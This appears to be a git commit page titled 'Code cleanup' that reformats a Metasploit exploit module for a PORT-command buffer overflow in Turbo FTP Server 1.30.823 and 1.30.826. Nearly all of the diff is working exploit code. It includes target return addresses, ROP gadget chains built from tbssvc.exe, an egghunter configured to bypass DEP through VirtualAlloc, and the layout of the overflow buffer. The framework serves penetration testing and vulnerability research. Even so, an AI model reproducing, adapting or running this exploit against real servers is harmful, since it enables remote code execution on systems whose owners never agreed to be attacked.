Code cleanup
This commit is contained in:
parent
6bccfcd376
commit
72d70b6bc2
|
@ -1,7 +1,3 @@
|
||||||
##
|
|
||||||
#
|
|
||||||
##
|
|
||||||
|
|
||||||
##
|
##
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
@ -24,49 +20,45 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
This module exploits the buffer overflow found in the PORT
|
This module exploits the buffer overflow found in the PORT
|
||||||
command in Turbo FTP Server 1.30.823 & 1.30.826.
|
command in Turbo FTP Server 1.30.823 & 1.30.826.
|
||||||
},
|
},
|
||||||
'Author' => [
|
'Author' =>
|
||||||
'Zhao Liang', #Initial Descovery
|
[
|
||||||
'Lincoln', #Metasploit
|
'Zhao Liang', #Initial Descovery
|
||||||
'corelanc0d3r', #Metasploit
|
'Lincoln', #Metasploit
|
||||||
'thelightcosine',#Metasploit
|
'corelanc0d3r', #Metasploit
|
||||||
],
|
'thelightcosine' #Metasploit
|
||||||
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Version' => '$',
|
|
||||||
'Platform' => [ 'win' ],
|
'Platform' => [ 'win' ],
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'OSVDB', '85887' ],
|
[ 'OSVDB', '85887' ]
|
||||||
],
|
],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => "\x00",
|
'BadChars' => "\x00",
|
||||||
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
|
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
|
||||||
'EncoderOptions' =>
|
'EncoderOptions' => { 'BufferRegister' => 'EDI' }
|
||||||
{
|
|
||||||
'BufferRegister' => 'EDI',
|
|
||||||
}
|
|
||||||
|
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Automatic', {} ],
|
[ 'Automatic', {} ],
|
||||||
['Windows Universal TurboFtp 1.30.823',
|
['Windows Universal TurboFtp 1.30.823',
|
||||||
{
|
{
|
||||||
'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]
|
'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]
|
||||||
'ver' => 823
|
'ver' => 823
|
||||||
},
|
},
|
||||||
|
|
||||||
],
|
],
|
||||||
[ 'Windows Universal TurboFtp 1.30.826',
|
[ 'Windows Universal TurboFtp 1.30.826',
|
||||||
{
|
{
|
||||||
'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]
|
'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]
|
||||||
'ver' => 826
|
'ver' => 826
|
||||||
},
|
},
|
||||||
],
|
],
|
||||||
],
|
],
|
||||||
|
|
||||||
'DisclosureDate' => 'Oct 03 2012',
|
'DisclosureDate' => 'Oct 03 2012',
|
||||||
'DefaultTarget' => 1))
|
'DefaultTarget' => 0))
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
@ -82,7 +74,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def create_rop_chain(ver)
|
def create_rop_chain(ver)
|
||||||
|
|
||||||
# rop chain generated with mona.py - www.corelan.be
|
# rop chain generated with mona.py - www.corelan.be
|
||||||
if ver == 823
|
if ver == 823
|
||||||
rop_gadgets =
|
rop_gadgets =
|
||||||
|
@ -93,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
0x00423b95, # XCHG EDX,EDI # RETN [tbssvc.exe]
|
0x00423b95, # XCHG EDX,EDI # RETN [tbssvc.exe]
|
||||||
0x00423a27, # XCHG ESI,EDI # RETN [tbssvc.exe]
|
0x00423a27, # XCHG ESI,EDI # RETN [tbssvc.exe]
|
||||||
0x005d1c99, # POP EBP # RETN [tbssvc.exe]
|
0x005d1c99, # POP EBP # RETN [tbssvc.exe]
|
||||||
0x004cad5d , # & jmp esp [tbssvc.exe]
|
0x004cad5d, # & jmp esp [tbssvc.exe]
|
||||||
0x004ab16b, # POP EBX # RETN [tbssvc.exe]
|
0x004ab16b, # POP EBX # RETN [tbssvc.exe]
|
||||||
0x00000001, # 0x00000001-> ebx
|
0x00000001, # 0x00000001-> ebx
|
||||||
0x005ef7f6, # POP EDX # RETN [tbssvc.exe]
|
0x005ef7f6, # POP EDX # RETN [tbssvc.exe]
|
||||||
|
@ -135,7 +126,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
my_target = target
|
my_target = target
|
||||||
if my_target.name == 'Automatic'
|
if my_target.name == 'Automatic'
|
||||||
print_status("Automatically detecting the target")
|
print_status("Automatically detecting the target")
|
||||||
|
@ -162,11 +152,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
eggoptions =
|
eggoptions =
|
||||||
{
|
{
|
||||||
:checksum => true,
|
:checksum => true,
|
||||||
:eggtag => 'w00t',
|
:eggtag => 'w00t',
|
||||||
:depmethod => 'virtualalloc',
|
:depmethod => 'virtualalloc',
|
||||||
:depreg => 'esi'
|
:depreg => 'esi'
|
||||||
}
|
}
|
||||||
|
|
||||||
badchars = "\x00"
|
badchars = "\x00"
|
||||||
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
|
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
|
||||||
|
|
||||||
|
@ -182,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
buf1 = rand_text_alpha(2012)
|
buf1 = rand_text_alpha(2012)
|
||||||
buf1 << egg
|
buf1 << egg
|
||||||
buf1 << rand_text_alpha(100)
|
buf1 << rand_text_alpha(100)
|
||||||
|
|
||||||
buf2 = rand_text_alpha(4).unpack('C*').join(',')
|
buf2 = rand_text_alpha(4).unpack('C*').join(',')
|
||||||
buf2 << ","
|
buf2 << ","
|
||||||
|
|
Loading…
Reference in New Issue